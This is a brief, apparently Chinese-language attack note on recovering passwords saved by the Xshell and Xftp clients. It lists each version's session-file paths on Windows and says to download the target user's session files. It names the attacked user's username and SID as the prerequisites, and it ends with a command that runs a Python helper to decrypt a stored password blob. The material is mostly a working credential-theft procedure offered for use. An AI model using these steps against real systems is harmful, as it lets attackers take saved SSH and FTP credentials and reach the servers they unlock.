工具
how-does-Xmanager-encrypt-password
实现
xshell配置文件位置:
xshell7: C:\Users\%username%\Documents\NetSarang Computer\7\Xshell\Sessions
xshell6: C:\Users\%username%\Documents\NetSarang Computer\6\Xshell\Sessions
XShell5: %userprofile%\Documents\NetSarang\Xshell\Sessions
XFtp5: %userprofile%\Documents\NetSarang\Xftp\Sessions
XShell6: %userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions
XFtp6: %userprofile%\Documents\NetSarang Computer\6\Xftp\Sessions
将目标用户的xshell的zsh配置文件下载到本地
利用条件:
1.xln配置文件中的password
2.被攻击用户的当前用户的username与sid,username不用加域名。
python3 XShellCryptoHelper.py -d -user Administrator -sid S-1-5-21-917267712-1342860078-1792151419-512 zv21O1x43qRs3c5NckDHvh7ZAvuN1NSJl8ZFL11+UJ+82+KAixa89O3OTAfRTg==